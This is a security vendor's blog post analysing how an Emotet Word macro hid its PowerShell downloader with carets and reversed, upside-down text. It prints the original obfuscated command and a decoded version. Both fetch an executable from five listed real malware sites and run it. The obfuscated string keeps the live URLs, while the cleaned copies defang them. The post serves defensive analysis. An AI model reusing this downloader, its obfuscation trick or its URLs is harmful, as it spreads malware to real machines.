Barkly vs Malware
Barkly Research
Sep 2018

Unraveling Emotet's Latest Macro Obfuscation

Emotet-macro-september-2018

Emotet continues to be one of the most active strains of malware. Let's see what tricks the latest campaigns have up their sleeves.

Attack campaigns distributing Emotet have become a regular occurrence, with each new onslaught continuing to claim more victims. We've written about Emotet multiple times here on the Barkly blog 1, 2, 3, and have been closely tracking its evolution from a standalone banking trojan to a prolific downloader for other malware. During this time, Emotet has gained notoriety for being a relentless menace, with the United States Computer Emergency Readiness Team (US-CERT) recently describing it as "among the most costly and destructive malware" affecting organizations today. 

What makes Emotet incidents so troublesome to deal with is the malware's potent combination of persistence mechanisms and worm-like features, which ensure infections are difficult to contain and remove. Because Emotet actively downloads additional malware and repeatedly re-launches itself, infections can get out of hand in a hurry — during incidents where companies have brought Barkly in to help address active outbreaks we've seen hundreds of new payloads spawned in a matter of days. 

Adding urgency to remediation is the fact that Emotet infections also often result in attackers hijacking victim email accounts and using them to send malware-laden emails to their contacts. 

All told, attacks have cost victims up to $1 million each to remediate.

New trick to sneak Emotet past AV

Emotet hasn't become one of the most prevalent malware strains by standing pat. The criminals behind the operation are constantly issuing tweaks to make the malware more evasive and effective. So when Barkly was approached by a company experiencing an outbreak last week we jumped at the opportunity to help out and also dig into the latest tactics and techniques the Emotet crew was utilizing.  

Once the Barkly agent was installed on machines on the company's network it almost immediately began blocking executable files identified as Emotet payloads. On machines that had not yet been infected, the agent also began blocking malicious Word documents that were attempting to retrieve payloads. By stopping the attacks at this early point Barkly was able to stop Emotet payloads from even touching these machines, thereby preventing them from being infected. 

Barkly-vs-Emotet-active-infections

Click to expand

True to previous Emotet campaigns, the Word documents contained a malicious macro that was designed to launch PowerShell in order to retrieve and execute an Emotet payload from a remote C&C server. 

What made this macro interesting, however, is the way it had been obfuscated. Attackers regularly use obfuscation techniques to disguise malicious commands, and this macro used one of the most basic and common methods — using meaningless ^ characters to break regex searches/pattern matching. But it also went a step further. The attackers had reversed the commands in two ways — the code actually reads from right to left and from the bottom up.

Black mirror: A malicious upside-down macro that reads in reverse 

Below is the obfuscated macro in its original form:

cmd /V:/C"^s^et P^G^b=^ ^ ^ ^ ^ ^ ^ }^}{^hct^ac^}^;ka^er^b^;f^Bn^$^ ^me^t^I-ekovn^I^;)^f^Bn^$^ ,^w^E^O^$(^e^liF^d^aoln^woD.p^sN${yr^t{)Bjz^$ n^i ^w^E^O^$(hc^a^erof;'exe^.'^+Dr^O$+'^\'^+c^il^b^up^:vne$^=f^Bn^$;'9^6^6' = ^Dr^O$^;)^'^@'(t^i^lpS.^'u^Jsu^f/moc.^s^b^a^l-l^3//^:p^tt^h@o^Y^w^uA/ur^.ksrkadi^m^etr^a//^:ptth@^7r^6rU/o^fni^.^ay^er^ts^a//^:ptth^@^FZ^Uy^7k21/m^oc.re^ta^ews^h^a//:^p^tth@QL^hs/^ten.e^gd^ihc//^:pt^th'=B^jz^$^;^tn^e^ilC^be^W^.t^eN^ ^tce^j^b^o-^wen=psN^$ llehsrewo^p&&^f^or /^L %^4 ^in (3^42^;-^1^;^0)d^o s^e^t ^ZS=!^ZS!!P^G^b:~%^4,1!&&i^f %^4=^=^0 ca^l^l %^ZS:^*^Z^S^!^=%"

First, let's strip out the unnecessary carets. As we can see, the code still doesn't look quite right.


cmd /V:/C
    "
    set PGb=       }}{hctac};kaerb;fBn$ metI-ekovnI;)fBn$ ,wEO$(eliFdaolnwoD.psN${yrt{)Bjz$ ni wEO$(hcaerof;'exe.'+DrO$+'\'+cilbup:vne$=fBn$;'966' = DrO$;)'@'(tilpS.'uJsuf/moc.sbal-l3//:pxxh@oYwuA/ur.ksrkadimetra//:pxxh@7r6rU/ofni.ayertsa//:pxxh@FZUy7k21/moc.retaewsha//:pxxh@QLhs/ten.egdihc//:pxxh'=Bjz$;tneilCbeW.teN tcejbo-wen=psN$ llehsrewop
    &&
    for /L %4 in (342;-1;0)
        do set ZS=!ZS!!PGb:~%4,1!
        && 
        if %4==0
            call %ZS:*ZS!=%
    "

This is when we noticed the text had been modified to read backwards (right to left) and upside down (bottom to top). What happens when we flip it and reverse it?


powershell $Nsp=new-object Net.WebClient;
$zjB='hxxp://chidge.net/shLQ@hxxp://ahsweater.com/12k7yUZF@hxxp://astreya.info/Ur6r7@hxxp://artemidakrsk.ru/AuwYo@hxxp://3l-labs.com/fusJu'.Split('@');
$OrD = '669';
$nBf=$env:public+'\'+$OrD+'.exe';
foreach($OEw in $zjB){
    try{$Nsp.DownloadFile($OEw, $nBf);
        Invoke-Item $nBf;
        break;
    }
    catch{}
} 

It's worth it. Now we can see the code was written to feed a series of commands to PowerShell using cmd.exe. The goal of these commands is to retrieve and execute a payload (669.exe) from one of the following websites (note: we've substituted "http" with "hxxp" in the boxes above and below to prevent regrettable clicks):


$zjB="hxxp://chidge.net/shLQ",
    "hxxp://ahsweater.com/12k7yUZF",
    "hxxp://astreya.info/Ur6r7",
    "hxxp://artemidakrsk.ru/AuwYo",
    "hxxp://3l-labs.com/fusJu";

$nBf = "C:\Users\Public\669.exe"    

These websites appeared in sysadmin and researcher Joseph Roosen's collection of Emotet indicators of compromise (IoCs) for 9/14/18 - 9/18/18

It also appears that the crew behind Ursnif, another versatile trojan, adopted the new obfuscation style at the same time as Emotet.  

This isn't the first time signs have pointed to collaboration and/or code and tool reuse among these groups. It's also another indication of how modular and commodified today's attack ecosystem is getting. Emotet, itself, is a good example of how malware groups are increasingly specializing their offerings to address specific aspects of the infection and monetization process. It has evolved into a downloader solely responsible for gaining initial access to machines so it can retrieve other groups' malware. That's the primary service that it sells. 

But even that distinct service involves several components (distribution, malicious Word doc and macro creation, etc.), which can also be bought or sold à la carte. For example, the crew behind Emotet may have created a tool for creating malicious Word docs that they're charging other groups to use in addition to using it in their own campaigns. Or they could simply be farming out that task and using a tool like the Rubella Macro Builder that other groups are using, as well.  

In any case, the "upside-down and in reverse" obfuscation method is simply the latest trick in attackers' ongoing attempts to evade detection. New obfuscation techniques and other evasive tactics are introduced regularly, and they're frequent reminders of why security tools based on scanning need to be supplemented or replaced with tools that can react to malicious behaviors and process patterns.

How Barkly blocks malicious Office documents 

Barkly-vs-Emotet-Word-doc

Rather than rely on file analysis alone (and get caught in the never-ending cat-and-mouse game of chasing the latest obfuscation tactics), Barkly can determine an Office document is malicious by what it attempts to do, not just what it looks like. 

For example, Barkly can recognize when an Office document is attempting to perform risky behavior, such as using cmd.exe to launch PowerShell and call out to the Internet, and block that behavior before it has a chance to complete any malicious intent.

As a result, payloads don't get retrieved. They never even touch the machine. In other words, the attack attempt gets nipped in the bud. This approach has been responsible for keeping customers protected from Emotet and a host of other malware.

Find out how Barkly can protect your organization with stronger, smarter security that just works. Learn more.

Want DIY tips for hardening your systems against malicious Office documents? Download our free guide.  

Barkly Research

Barkly Research

Barkly's malware research team is hard at work stopping new malware that sneaks past antivirus.

lock-white.png

Don't be the last to know about new attacks

Join a group of 10,000 IT and security pros who get clear, actionable takes on malware and infosec news.

Subscribe

Comments

Stay informed!

Get the latest security news, tips, and trends straight to your inbox.

Stay informed!

Get the latest security news, tips, and trends straight to your inbox.